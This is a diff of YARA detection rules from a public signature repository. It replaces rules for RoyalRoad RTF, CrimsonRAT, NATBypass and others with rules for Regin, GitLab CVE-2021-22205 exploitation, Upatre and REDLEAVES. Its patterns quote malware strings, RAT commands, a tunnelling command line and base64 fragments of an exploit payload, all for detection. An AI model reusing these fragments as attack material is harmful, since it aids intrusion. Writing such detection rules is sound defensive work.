-		logic_hash = "da043123cf72e19295634720196d78bef3af89f44cba795dbbcee4c0f5c8159a"
-		score = 60
+		hash = "29105f46e4d33f66fee346cfd099d1cc"
+		logic_hash = "1b026f475fdbb3c97f33895520844fa4944eb2fffc0883502a6cb79162bbd388"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		version = "1.0"
 
 	strings:
-		$v7_1 = "{\\object\\objocx{\\objdata" ascii
-		$v7_2 = "ods0000" ascii
-		$RTF = "{\\rt"
+		$a1 = "sharepw"
+		$a2 = "reglist"
+		$a3 = "logdump"
+		$a4 = "Name:" wide
+		$a5 = "Phys Avail:"
+		$a6 = "cmd.exe" wide
+		$a7 = "ping.exe" wide
+		$a8 = "millisecs"
 
 	condition:
-		$RTF at 0 and all of ( $v7* )
+		uint16( 0 ) == 0x5A4D and all of ( $a* )
 }
-rule SIGNATURE_BASE_Royalroad_Encode_In_RTF : FILE
+rule SIGNATURE_BASE_Apt_Regin_Hopscotch : FILE
 {
 	meta:
-		description = "Detects RoyalRoad weaponized RTF documents"
-		author = "nao_sec"
-		id = "66614152-8f9b-5e62-b6bd-ba0286e66d4d"
-		date = "2020-01-15"
-		modified = "2023-12-05"
-		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_royalroad.yar#L168-L189"
+		description = "Rule to detect Regin's Hopscotch module"
+		author = "Kaspersky Lab"
+		id = "907042ba-8e64-5ca7-9a83-70c28af1ab99"
+		date = "2015-01-22"
+		date = "2023-01-27"
+		modified = "2024-04-24"
+		reference = "https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-legspin/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_regin_fiveeyes.yar#L321-L342"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "00a703a0d7b3a74ec9bfc8ad0e570ee04b3cb6b7f2c062cc2886b41f6fbea49d"
-		score = 60
+		hash = "6c34031d7a5fc2b091b623981a8ae61c"
+		logic_hash = "33b5fa61aaa802a60f3d42d59eb474222841a8a557b06b23a9e325e922e2cec1"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		version = "1.0"
 
 	strings:
-		$enc_hex_1 = "B0747746"
-		$enc_hex_2 = "B2A66DFF"
-		$enc_hex_3 = "F2A32072"
-		$enc_hex_4 = "B2A46EFF"
-		$enc_hex_1l = "b0747746"
-		$enc_hex_2l = "b2a66Dff"
-		$enc_hex_3l = "f2a32072"
-		$enc_hex_4l = "b2a46eff"
-		$RTF = "{\\rt"
+		$a1 = "AuthenticateNetUseIpc"
+		$a2 = "Failed to authenticate to"
+		$a3 = "Failed to disconnect from"
+		$a4 = "%S\\ipc$" wide
+		$a5 = "Not deleting..."
+		$a6 = "CopyServiceToRemoteMachine"
+		$a7 = "DH Exchange failed"
+		$a8 = "ConnectToNamedPipes"
 
 	condition:
-		$RTF at 0 and 1 of ( $enc_hex* )
+		uint16( 0 ) == 0x5A4D and all of ( $a* )
 }
-rule SIGNATURE_BASE_APT_Area1_SSF_Plugx
+rule SIGNATURE_BASE_Regin_Related_Malware
 {
 	meta:
-		description = "Detects send tool used in phishing campaign reported by Area 1 in December 2018"
-		author = "Area 1"
-		id = "a5b4e781-f0d1-55df-926c-2d321aa48139"
-		date = "2018-12-19"
-		modified = "2023-12-05"
-		reference = "https://cdn.area1security.com/reports/Area-1-Security-PhishingDiplomacy.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_area1_phishing_diplomacy.yar#L2-L27"
+		description = "Malware Sample - maybe Regin related"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9377dd52-244f-5289-a2a3-88b6377b2dd2"
+		date = "2015-06-03"
+		modified = "2024-04-24"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_regin_fiveeyes.yar#L344-L367"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a71f124f0c89c4b020f21d029d0d2997b2bea71526e83bcadffb67acc9cca8f7"
-		score = 75
+		hash = "76c355bfeb859a347e38da89e3d30a6ff1f94229"
+		logic_hash = "61ce7a69ab357740158e355455362a4f5fddc67ee60af120733f509e7407216f"
+		score = 70
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$feature_call = { 8b 0? 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
-         6a 07 6a ff ff d0 8b f0 85 f6 74 14 }
-		$keylogger_reg = { 8b 4d 08 6a 0c 6a 01 8d 55 f4 52 c7 45 f4 01 00 06 00
-         c7 45 f8 00 01 00 00 89 4d fc ff d0 85 c0 75 1d }
-		$file_op = { 55 8b ec 83 ec 20 0f b7 56 18 8b 46 10 66 8b 4e 14 89 45 e4
-         8d 44 32 10 66 89 4d f0 0f b7 4e 1a 57 89 45 e8 33 ff 8d 45 e0 8d 54
-         31 10 50 89 7d e0 89 55 ec c7 45 fa ?? ?? ?? ?? 89 7d f2 89 7d f6 ff
-         15 1c 43 02 10 }
-		$ver_cmp = { 0f b6 8d b0 fe ff ff 0f b6 95 b4 fe ff ff 66 c1 e1 08 0f b7
-         c1 0b c2 3d 02 05 00 00 7f 2c }
-		$regedit = { c7 06 23 01 12 20 c7 46 04 01 90 00 00 89 5e 0c 89 5e 08 e8
-         51 fb ff ff 8b 4d 08 8b 50 38 68 30 75 00 00 56 51 ff d2 }
-		$get_device_caps = { 8b 1d ?? ?? ?? ?? 6a 08 50 ff d3 0f b7 56 12 8b c8 0f af ca
-         b8 1f 85 eb 51 f7 e9 c1 fa 05 8b c2 c1 e8 1f 03 c2 89 45 f8 8b 45 f0 6a 0a 50 ff d3
-         0f b7 56 14 8b c8 0f af ca b8 1f 85 eb 51 }
+		$s1 = "%c%s%c -p %d -e %d -pv -c \"~~[%x] s; .%c%c%s %s /u %s_%d.dmp; q\"" fullword wide
+		$s0 = "Software\\Microsoft\\Windows NT\\CurrentVersion\\HotFix" fullword wide
+		$s2 = "%x:%x:%x:%x:%x:%x:%x:%x%c" fullword ascii
+		$s3 = "disp.dll" fullword ascii
+		$s4 = "msvcrtd.dll" fullword ascii
+		$s5 = "%d.%d.%d.%d%c" fullword ascii
+		$s6 = "%ls_%08x" fullword wide
+		$s8 = "d%ls%ls" fullword wide
+		$s9 = "Memory location: 0x%p, size 0x%08x" fullword wide
 
 	condition:
-		3 of them
+		$s1 or 3 of ( $s* )
 }
-rule SIGNATURE_BASE_APT_Area1_SSF_Googlesend_Strings : FILE
+rule SIGNATURE_BASE_EXPL_Gitlab_CE_RCE_CVE_2021_22205 : CVE_2021_22205
 {
 	meta:
-		description = "Detects send tool used in phishing campaign reported by Area 1 in December 2018"
-		author = "Area 1 (modified by Florian Roth)"
-		id = "66a2faa1-b133-528c-91a9-06a43d2c00a0"
-		date = "2018-12-19"
+		description = "Detects signs of exploitation of GitLab CE CVE-2021-22205"
+		author = "Florian Roth (Nextron Systems)"
+		id = "21cc6fa7-e50d-5b8e-815d-27315ab5635d"
+		date = "2021-10-26"
 		modified = "2023-12-05"
-		reference = "https://cdn.area1security.com/reports/Area-1-Security-PhishingDiplomacy.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_area1_phishing_diplomacy.yar#L29-L46"
+		reference = "https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_gitlab_cve_2021_22205.yar#L2-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3a373ed63494b67883515c133bf5b0af3ab874397c7cb45c8399f12e35212be4"
-		score = 75
+		logic_hash = "54b841716a6bd56706c1c38fcda9a27ffd7feba2660602b191e8e347983e578d"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = "CVE-2021-22205"
 
 	strings:
-		$conf = "RefreshToken.ini" wide
-		$client_id = "Enter your client ID here" wide
-		$client_secret = "Enter your client secret here" wide
-		$status = "We are going to send" wide
-		$s1 = { b8 00 01 00 00 f0 0f b0 23 74 94 f3 90 80 3d ?? ?? ?? ?? 00 75 ??
-         51 52 6a 00 e8 ?? ?? ?? ?? 5a 59 b8 00 01 00 00 f0 0f b0
-         23 0f ?? ?? ?? ?? ?? 51 52 6a 0a e8 ?? ?? ?? ?? 5a 59 eb c3 }
+		$sa1 = "VXNlci5maW5kX2J5KHVzZXJuYW1l" ascii
+		$sa2 = "VzZXIuZmluZF9ieSh1c2VybmFtZ" ascii
+		$sa3 = "Vc2VyLmZpbmRfYnkodXNlcm5hbW" ascii
+		$sb1 = "dXNlci5hZG1pb" ascii
+		$sb2 = "VzZXIuYWRtaW" ascii
+		$sb3 = "1c2VyLmFkbWlu" ascii
+		$sc1 = "dXNlci5zYXZlI" ascii
+		$sc2 = "VzZXIuc2F2ZS" ascii
+		$sc3 = "1c2VyLnNhdmUh" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		1 of ( $sa* ) and 1 of ( $sb* ) and 1 of ( $sc* )
 }
-rule SIGNATURE_BASE_HKTL_Natbypass_Dec22_1 : T1090 FILE
+rule SIGNATURE_BASE_EXPL_Gitlab_CE_RCE_Malformed_JPG_CVE_2021_22204 : CVE_2021_22204 CVE_2021_22205 FILE
 {
 	meta:
-		description = "Detects NatBypass tool (also used by APT41)"
+		description = "Detects malformed JPG files exploting EXIF vulnerability CVE-2021-22204 and used in the exploitation of GitLab vulnerability CVE-2021-22205"
 		author = "Florian Roth (Nextron Systems)"
-		id = "54af4d84-72f7-5ec4-b0bf-7ba228fdf508"
-		date = "2022-12-27"
+		id = "3d769340-0306-596d-8783-2b37b93a5673"
+		date = "2021-10-26"
 		modified = "2023-12-05"
-		reference = "https://github.com/cw1997/NATBypass"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/hktl_natbypass.yar#L2-L24"
+		reference = "https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=blog"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_gitlab_cve_2021_22205.yar#L29-L44"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8af76d7d9d4500dc219090fbd8ca8cd9fd17bfc224f14a411febfd6f75b92206"
-		score = 80
-		quality = 85
-		tags = "T1090, FILE"
-		hash1 = "4550635143c9997d5499d1d4a4c860126ee9299311fed0f85df9bb304dca81ff"
+		logic_hash = "0718ad24337acbb746c6e0d7e0b42d2d034ff583ec6fd12b34fda4737d7e78b0"
+		score = 70
+		quality = 83
+		tags = "CVE-2021-22204, CVE-2021-22205, FILE"
 
 	strings:
-		$x1 = "nb -slave 127.0.0.1:3389 8.8.8.8:1997" ascii
-		$x2 = "| Welcome to use NATBypass Ver" ascii
-		$s1 = "main.port2host.func1" ascii fullword
-		$s2 = "start to transmit address:" ascii
-		$s3 = "^(\\d{1,2}|1\\d\\d|2[0-4]\\d|25[0-5])\\.(\\d{1,2}|1\\d\\d|2[0-4]\\d|25[0-5])\\.(\\d{1,2}|1\\d\\d|2[0-4]\\d|25[0-5])\\.(\\d{1,2}|1\\d\\d|2[0-4]\\d|25[0-5])"
+		$h1 = { 41 54 26 54 46 4F 52 4D }
+		$sr1 = /\(metadata[\s]{0,3}\([A-Za-z]{1,20} "\\/
 
 	condition:
-		filesize < 8000KB and ( 1 of ( $x* ) or 2 of them ) or 3 of them
+		filesize < 10KB and $h1 and $sr1
 }
-rule SIGNATURE_BASE_Hunting_Rule_Shikataganai
+rule SIGNATURE_BASE_Upatre_Hazgurut : FILE
 {
 	meta:
-		description = "No description has been set in the source file - Signature Base"
-		author = "Steven Miller"
-		id = "fe266a42-0480-5a98-9368-8a18aa5e4f69"
-		date = "2023-12-05"
+		description = "Detects Upatre malware - file hazgurut.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b0040452-ed63-5e90-9ed6-4f05e7b4eadc"
+		date = "2015-10-13"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_shikataganai.yar#L1-L22"
+		reference = "https://weankor.vxstream-sandbox.com/sample/6b857ef314938d37997c178ea50687a281d8ff9925f0c4e70940754643e2c0e3?environmentId=7"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_upatre_oct15.yar#L8-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "733522cb1d61f4bbb300d73ff21d9d7d10a78aae06e03408fce4b88e4c51f662"
-		score = 50
+		logic_hash = "41dd2f615d1c75ef81073d26bfbdb4f5c6735d9a3ff6d543ca77d6e16fe7eb5b"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7ee0d20b15e24b7fe72154d9521e1959752b4e9c20d2992500df9ac096450a50"
+		hash2 = "79ffc620ddb143525fa32bc6a83c636168501a4a589a38cdb0a74afac1ee8b92"
+		hash3 = "62d8a6880c594fe9529158b94a9336179fa7a3d3bf1aa9d0baaf07d03b281bd3"
+		hash4 = "c64282aca980d558821bec8b3dfeae562d9620139dc43d02ee4d1745cd989f2a"
+		hash5 = "a35f9870f9d4b993eb094460b05ee1f657199412807abe6264121dd7cc12aa70"
+		hash6 = "f8cb2730ebc8fac1c58da1346ad1208585fe730c4f03d976eb1e13a1f5d81ef9"
+		hash7 = "b65ad7e2d299d6955d95b7ae9b62233c34bc5f6aa9f87dc482914f8ad2cba5d2"
+		hash8 = "6b857ef314938d37997c178ea50687a281d8ff9925f0c4e70940754643e2c0e3"
+		hash9 = "33a288cef0ae7192b34bd2ef3f523dfb7c6cbc2735ba07edf988400df1713041"
+		hash10 = "2a8e50afbc376cb2a9700d2d83c1be0c21ef942309676ecac897ba4646aba273"
+		hash11 = "3d0f2c7e07b7d64b1bad049b804ff1aae8c1fc945a42ad555eca3e1698c7f7d3"
+		hash12 = "951360b32a78173a1f81da0ded8b4400e230125d05970d41621830efc5337274"
+		hash13 = "bd90faebfd7663ef89b120fe69809532cada3eb94bb94094e8bc615f70670295"
+		hash14 = "8c5823f67f9625e4be39a67958f0f614ece49c18596eacc5620524bc9b6bad3d"
+
+	strings:
+		$a1 = "barcod" fullword ascii
+		$s0 = "msports.dll" fullword ascii
+		$s1 = "nddeapi.dll" fullword ascii
+		$s2 = "glmf32.dll" fullword ascii
+		$s3 = "<requestedExecutionLevel level=\"requireAdministrator\" uiAccess=\"false\">" fullword ascii
+		$s4 = "cmutil.dll" fullword ascii
+		$s5 = "mprapi.dll" fullword ascii
+		$s6 = "glmf32.dll" fullword ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 1500KB and $a1 in ( 0 .. 4000 ) and all of ( $s* )
+}
+rule SIGNATURE_BASE_Dropper_Deploysmalwareviasideloading
+{
+	meta:
+		description = "Detects a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX"
+		author = "USG"
+		id = "2e7cdedd-2358-5d71-a3ec-73dec442d840"
+		date = "2024-04-17"
+		modified = "2024-04-17"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_uscert_ta17-1117a.yar#L9-L21"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "51d8a0785bc25cf02460b9b7490ccba3d67806c953e6aa3d3882341ce11857fa"
+		score = 75
 		quality = 85
 		tags = ""
-		company = "FireEye"
+		true_positive = "5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481: drops REDLEAVES. 6392e0701a77ea25354b1f40f5b867a35c0142abde785a66b83c9c8d2c14c0c3: drops plugx. "
 
 	strings:
-		$varInitializeAndXorCondition1_XorEAX = { B8 ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 59 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 40 | 41 | 42 | 43 | 45 | 46 | 47 ) ?? }
-		$varInitializeAndXorCondition1_XorEBP = { BD ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5B | 5C | 5E | 5F ) [0-50] 31 ( 68 | 69 | 6A | 6B | 6D | 6E | 6F ) ?? }
-		$varInitializeAndXorCondition1_XorEBX = { BB ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5C | 5D | 5E | 5F ) [0-50] 31 ( 58 | 59 | 5A | 5B | 5D | 5E | 5F ) ?? }
-		$varInitializeAndXorCondition1_XorECX = { B9 ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 48 | 49 | 4A | 4B | 4D | 4E | 4F ) ?? }
-		$varInitializeAndXorCondition1_XorEDI = { BF ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5B | 5C | 5D | 5E ) [0-50] 31 ( 78 | 79 | 7A | 7B | 7D | 7E | 7F ) ?? }
-		$varInitializeAndXorCondition1_XorEDX = { BA ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 50 | 51 | 52 | 53 | 55 | 56 | 57 ) ?? }
-		$varInitializeAndXorCondition2_XorEAX = { D9 74 24 F4 [0-30] B8 ?? ?? ?? ?? [0-10] ( 59 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 40 | 41 | 42 | 43 | 45 | 46 | 47 ) ?? }
-		$varInitializeAndXorCondition2_XorEBP = { D9 74 24 F4 [0-30] BD ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5B | 5C | 5E | 5F ) [0-50] 31 ( 68 | 69 | 6A | 6B | 6D | 6E | 6F ) ?? }
-		$varInitializeAndXorCondition2_XorEBX = { D9 74 24 F4 [0-30] BB ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5C | 5D | 5E | 5F ) [0-50] 31 ( 58 | 59 | 5A | 5B | 5D | 5E | 5F ) ?? }
-		$varInitializeAndXorCondition2_XorECX = { D9 74 24 F4 [0-30] B9 ?? ?? ?? ?? [0-10] ( 58 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 48 | 49 | 4A | 4B | 4D | 4E | 4F ) ?? }
-		$varInitializeAndXorCondition2_XorEDI = { D9 74 24 F4 [0-30] BF ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5B | 5C | 5D | 5E ) [0-50] 31 ( 78 | 79 | 7A | 7B | 7D | 7E | 7F ) ?? }
-		$varInitializeAndXorCondition2_XorEDX = { D9 74 24 F4 [0-30] BA ?? ?? ?? ?? [0-10] ( 58 | 59 | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 50 | 51 | 52 | 53 | 55 | 56 | 57 ) ?? }
+		$UniqueString = {2e 6c 6e 6b [0-14] 61 76 70 75 69 2e 65 78 65}
+		$PsuedoRandomStringGenerator = {b9 1a [0-6] f7 f9 46 80 c2 41 88 54 35 8b 83 fe 64}
 
 	condition:
 		any of them
 }
-rule SIGNATURE_BASE_Crimsonrat_Mar18_1 : FILE
+rule SIGNATURE_BASE_REDLEAVES_Droppedfile_Implantloader_Starburn
 {
 	meta:
-		description = "Detects CrimsonRAT malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "af21876c-f99d-5307-abba-02c57ee93df0"
-		date = "2018-03-06"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_crimson_rat.yar#L11-L42"
+		description = "Detects the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT"
+		author = "USG"
+		id = "976f42b1-58c9-554b-97e6-130a657507e2"
+		date = "2024-04-17"
+		modified = "2024-04-17"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_uscert_ta17-1117a.yar#L23-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "59b01a98a70c4bac08d396418fac24eb96e461a45502f63edc2a9aa87e05f960"
+		logic_hash = "2ebfdaf363ac80bc9bace3056ff86efd9c1b246c6f60373a82df4a0db901a6e3"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "acf2e8013b6fafcf436d5a05049896504ffa2e982bca05155d19981d1931c611"
-		hash2 = "7ca6e5ef1d346ec35993c910128a3526b098a07445131784a9358bf5679e3975"
-		hash3 = "be4264973de9886caedae1cb707586588d0da85ac7a2ad277db4258033ea12a8"
-		hash4 = "acf2e8013b6fafcf436d5a05049896504ffa2e982bca05155d19981d1931c611"
-		hash5 = "ff52b4a64ed7caeab00350e493968dbdb159aeb545fcba67d83ab9b158464de4"
+		tags = ""
+		true_positive = "7f8a867a8302fe58039a6db254d335ae"
 
 	strings:
-		$x1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|" wide
-		$x2 = "\\Release\\RTLBot.pdb" ascii
-		$x3 = "cmd.exe/c systeminfo >> 1.txt" fullword wide
-		$x4 = "/online >> Get online target with important info" fullword wide
-		$x5 = "/screen >> ScreenShot from target PC" fullword wide
-		$x6 = "/restart >> Restart Target PC" fullword wide
-		$x7 = "/log_key >> Get log key file" fullword wide
-		$a1 = "get_ShiftKey" fullword ascii
-		$a2 = "get_ControlKey" fullword ascii
-		$a3 = "get_AltKey" fullword ascii
-		$a4 = "get_MineInterval" fullword ascii
-		$fp1 = "Copyright Software Secure" wide
+		$XOR_Loop = {32 0c 3a 83 c2 02 88 0e 83 fa 08 [4-14] 32 0c 3a 83 c2 02 88 0e 83 fa 10}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or all of ( $a* ) ) and not 1 of ( $fp* )
+		any of them
 }
-rule SIGNATURE_BASE_Coreimpact_Sysdll_Exe
+rule SIGNATURE_BASE_REDLEAVES_Droppedfile_Obfuscatedshellcodeandrat_Handkerchief
 {
 	meta:
-		description = "Detects a malware sysdll.exe from the Rocket Kitten APT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bac55c00-5d14-59ca-8597-f52b4577be0c"
-		date = "2014-12-27"
-		modified = "2023-01-06"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_coreimpact_agent.yar#L6-L27"
+		description = "Detects obfuscated .dat file containing shellcode and core REDLEAVES RAT"
+		author = "USG"
+		id = "51a28529-1084-5f24-9369-6427e8d51d9d"
+		date = "2024-04-17"
+		modified = "2024-04-17"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_uscert_ta17-1117a.yar#L36-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f89a4d4ae5cca6d69a5256c96111e707"
-		logic_hash = "332b68e797e8ee3e26d797e106ae31e7240585ccb0ea599bebd8ac8f94313eab"
-		score = 70
-		quality = 85
+		logic_hash = "f91bd1ddd6691a0a5b6ebc6a28d35bb5b2e6c00754f07e58ffb01e06ad590ae3"
+		score = 75
+		quality = 83
 		tags = ""
+		true_positive = "fb0c714cd2ebdcc6f33817abe7813c36"
 
 	strings:
-		$s0 = "d:\\nightly\\sandbox_avg10_vc9_SP1_2011\\source\\avg10\\avg9_all_vs90\\bin\\Rele" ascii
-		$s1 = "Mozilla/5.0" fullword ascii
-		$s3 = "index.php?c=%s&r=%lx" fullword ascii
-		$s4 = "index.php?c=%s&r=%x" fullword ascii
-		$s5 = "127.0.0.1" fullword ascii
-		$s6 = "/info.dat" ascii
-		$s7 = "needroot" fullword ascii
-		$s8 = "./plugins/" ascii
+		$RedleavesStringObfu = {73 64 65 5e 60 74 75 74 6c 6f 60 6d 5e 6d 64 60 77 64 72 5e 65 6d 6d 6c 60 68 6f 2f 65 6d 6d}
 
 	condition:
-		$s0 or 6 of them
+		any of them
 }
-rule SIGNATURE_BASE_Cheshirecat_Sample2 : FILE
+rule SIGNATURE_BASE_REDLEAVES_Coreimplant_Uniquestrings : FILE
 {
 	meta:
-		description = "Auto-generated rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "14448138-0af3-5669-8aa3-f9e773e2a008"
-		date = "2015-08-08"
-		modified = "2023-12-05"
-		reference = "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cheshirecat.yar#L11-L30"
+		description = "Strings identifying the core REDLEAVES RAT in its deobfuscated state"
+		author = "USG"
+		id = "fd4d4804-f7d9-549d-8f63-5f409d6180f9"
+		date = "2018-12-20"
+		modified = "2024-04-17"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_uscert_ta17-1117a.yar#L49-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "dc18850d065ff6a8364421a9c8f9dd5fcce6c7567f4881466cee00e5cd0c7aa8"
-		logic_hash = "4dd299cfe36545dba5ccac22d2eedc405f548fe5f976514d1cfa8238b472782c"
-		score = 70
-		quality = 85
+		logic_hash = "ce6ab0f4007f3ea3c31442cab702ad3579faa6835d5ee9b4c03516ce0499bf3e"
+		score = 75
+		quality = 81
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "mpgvwr32.dll" fullword ascii
-		$s1 = "Unexpected failure of wait! (%d)" fullword ascii
-		$s2 = "\"%s\" /e%d /p%s" fullword ascii
-		$s4 = "error in params!" fullword ascii
-		$s5 = "sscanf" fullword ascii
-		$s6 = "<>Param : 0x%x" fullword ascii
+		$unique2 = "RedLeavesSCMDSimulatorMutex" nocase wide ascii
+		$unique4 = "red_autumnal_leaves_dllmain.dll" wide ascii
+		$unique7 = "\\NamePipe_MoreWindows" wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 4 of ( $s* )
+		not uint32( 0 ) == 0x66676572 and any of them
 }
-rule SIGNATURE_BASE_Cheshirecat_Gen1 : FILE
+rule SIGNATURE_BASE_PLUGX_Redleaves
 {
 	meta:
-		description = "Auto-generated rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2068feed-2101-5b12-9e36-db7b0f5cc4ec"
-		date = "2015-08-08"
-		modified = "2023-12-05"
-		reference = "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cheshirecat.yar#L35-L74"
+		description = "Detects specific RedLeaves and PlugX binaries"
+		author = "US-CERT Code Analysis Team"
+		id = "ede8ad8f-31cf-5314-9777-bddd60e499f2"
+		date = "2017-03-04"
+		date = "2017-04-03"
+		modified = "2024-04-17"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_uscert_ta17-1117a.yar#L66-L93"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d1bbda9340bc2d2fcefd6bf9a3c30fe0b99c66fb978b3a4583f17c521cfcf4b0"
-		score = 90
+		logic_hash = "0c52110eb18dcdb7a0d4b8c42f22368acdd1bce44a192abcd71a20bee2705475"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300"
-		hash2 = "32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a"
-		hash3 = "63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb"
